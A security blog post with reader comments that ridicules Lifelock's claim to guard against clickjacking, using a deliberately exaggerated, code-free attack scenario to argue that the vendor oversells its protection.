Cenzic 232 Patent
Paid Advertising
web application security lab

Lifelock Protects You from Clickjacking

Well, now I’ve seen everything. Just when I didn’t think I could ever be amazed more by attempts of overselling and snake oil, I get hit with this. Apparently Lifelock now purports to protect you from clickjacking. For those of you who don’t recall, Lifelock is the service that protects your identity, except for that one time when it doesn’t. But that’s neither here nor there and water under the bridge and all that. Here’s how lifelock protects you from clickjacking…

You log into your home firewall/router and forget to log out. Then you wind up on some compromised website and someone clickjacks you (regardless of browser - I have no idea what that Lifelock comment means, no browser has patched against it) and gets you to change your DNS to use an attacker controlled DNS server. Now every page you go to is effectively man in the middle’d. But instead of taking over every page the attacker takes over Google Adwords, since that effectively XSS’s every domain, and they can monetize their own sites in the process.

Next the attacker begins to steal your credentials to your accounts, and unfortunately you aren’t super good at using unique passwords, not that it matters since they can use forgot password and change password functions via XMLHTTPRequests and credential theft/replay. Plus since they own pretty much every webpage you go to and you rarely patch Adobe Flash, they are now listening to your microphone through a second clickjack. Now as you give up all your sensitive info on the phone with your bank, credit card companies and more they are right there listening via their version of Back Orifice for the web - because that’s what we’re really talking about here with clickjacking, isn’t it?

Anyway, next the attacker figures out where you work and begins to infiltrate using webmail. Soon they have access to most of your life, have installed malware in lieu of something you thought you were downloading over HTTP. Now, with their newly installed malware/keystroke logger they have access through your corporate VPN tunnel and they have access to all your online accounts work related or otherwise.

Then they begin to wire funds out of your account, attack your company, and use your machine as a child porn server since they can put your computer into the DMZ, having long ago compromised the firewall/router, running a brute force attack against it through their malware. Lastly, just for grins they compromise your Lifelock account, since you log into it from the same compromised machine, and they request to cancel it on your behalf.

So after the police come to your door to arrest you for proliferation of child pr0n (your wife leaving you for the same reason of course), and for the added charge of industrial espionage against your own company, and you realize that your bank account has been raided, and your identity has been stolen, at least you have someone to talk to over at the Lifelock helpline. Good luck getting your life put back together, I’m sure they’ll be very sympathetic with an incarcerated pervert who is awaiting trial and can only be reached at the federal holding facility, especially after you tried to cancel your account with them.

Yes, this is all just a wildly overly dramatic scenario, but so is the Lifelock’s statement. In their defense they probably meant it only as it relates to identity theft, not at all understanding any of the other possibilities relating to clickjacking or the hacking/security world as a whole for that matter. But isn’t that the point? If you don’t get it, you probably shouldn’t pretend you protect against it in any meaningful way. Consumers might not know the difference, but a hacker does.

18 Responses to “Lifelock Protects You from Clickjacking”

  1. Robert Says:

    As we say on the west coast that is ‘Hella Lame’.

  2. zero-cool Says:

    they know that the customer is a un-educated cow that they should extract (rip off) enterly from its milk.

    Any way that is how marketing work. almost the same way you can see it from Tv-shopping show.

  3. thrill Says:

    I heard PhishCops also protects against clickjacking, along with flat tires and sore throats. Roadside service is available for an extra cost though.

  4. noname Says:

    some sceurety guy from grc.com says that noscrpt for firefox prevents clickjacking even while running “global schriping allowed”
    since I am not a wiz my self I can’t dessprove it. so i’m running whit it

    correct my gramma and figure out what I wrote

  5. somename Says:

    What noname said (grammar-corrected and all) was:

    The latest versions of the NoScript extension for Mozilla Firefox web browser will protect against all known clickjackattacks, even if scripting is allowed at that site, or even if allowed globally. Steve Gibson of Gibson Research Corporation, www.grc.com, announced this on his weekly podcast, SecurityNow!

    I would just add that audio and text transcripts of that podcast can be found at http://www.grc.com/SecurityNow.htm; dowload Episode #168 dated 30 Oct. 2008, and that I got the impression from Gibson that NoScript developer Giorgio Maone first heard about the CJ attack from you, RSnake/RHansen (that is whom we’re talking to here, right?). In which case, props to RS for responsible disclosure to Maone, the only guy on the planet who would do something about it, and props to Maone for jumping on it. (M$? Ha! Mac? Naa, he’s too busy making fun of the PC guy in the commercials. Opera? Here’s what they think is important:

    “What’s New?

    CheckOpera Link: Now lets you synchronize custom Search engines and typed History too. So any website address you typed in one computer will be available in all your other computers.”)

    Wow!!! … and get clickjacked on all your other machines.

    Anyway, the Fx/Ns combo is allegedly CJ-safe. Comments from the article’s author?

  6. Cagekicker Says:

    It nearly brings tears to my eyes and a warm,cozy feeling everytime I see how on top of things Opera is…I don’t know how the hell I would survive if I weren’t able to synchronize all of my web browsing habits on all computers. =’oŽ

  7. somename Says:

    @ Cagekicker:
    My sentiments exactly. Well-said, bro!

    @noname:
    Dood, you gotta watch out for the notorious “cross-site-schriping” attack.

    @ Everyone:
    There shouldn’t have been a comma or semicolon at the end of the URLs for GRC and SecurityNow! Clicking gets you a 404 error. I didn’t realize that this site parses raw URLs into links without BBCode. Copy/paste without the comma or semicolon and you’re there. My bad.

  8. Human Says:

    @Robert

    lol

    i dont think this is good

  9. Asfasfos Says:

    If there’s any spanish reader of this blog I’ve translated this entry on my blog (asfasfos[dot]com). Really nice post by the way :)

  10. somename Says:

    @Asfasfos:
    ” Un servicio muy buen y importante, Senor(a)(ita)!

  11. GFCM Says:

    Well.. you know.. i have this magic coin that protects me against dragons (and dinossaurs!).

    And it really works, as long as i keep that coin in my pocket i will never see a dragon.

    It really seem to be the same case. Users really believe that the “magic coin” or “Lifelock” can protect them from things they dont understand (or in the case of the dragon, just don“t exists).

    Dont know if i made my point clear.

  12. Grymstone Says:

    I think everyone agrees on the uselessness of lifelock.
    It’s been talked about well over the internet security news and forums about how ineffective it is. The guarantee might be good, but the security isn’t.

  13. Rafal Los Says:

    @RSnake: Snakeoil and overselling… isn’t that Trey’s area of research? Anyway… good find. I see that idiotic commercial about the CEO of LIfeLock on TV all the time handing out his Social Security Number to everyone… I just want to punch the guy - but here’s the thing… they’re providing a service people are singing up to buy, which isn’t to say that it’s any good, just that they’re preying upon the right “fears and doubts” from scared people. I hate ambulance-chasers like these folks.

  14. onename Says:

    Kind of like with the first recession in the early 1940’s, tell everyone the banks are going bankrupt so that everyone runs to the bank to withdraw all of their money out, because of the fear that they will lose it all. Fear induced marketing is one of the oldest tricks in the books and while Lifeclock will no doubt frighten the masses into using their service, it creates for an even better feeling after they have been exploited.

  15. seehere Says:

    Actually if you knew your facts, they have never claimed to do this.

  16. RSnake Says:

    Funny, I thought I did know my facts and even pointed to the link where they said so on their corporate blog. :-/ Oh wait, I did!

  17. send9 Says:

    I read the whole article, and while terrible, there is no mention of LifeLock. Just their logo at the top of the page — the news story itself is not even on the LifeLock site. What am I missing?

  18. RSnake Says:

    @send9 - they changed the URL to do a 301 from the old page. Look at the URL before you click on it and it’ll give you a sense of what nonsense they were spouting originally.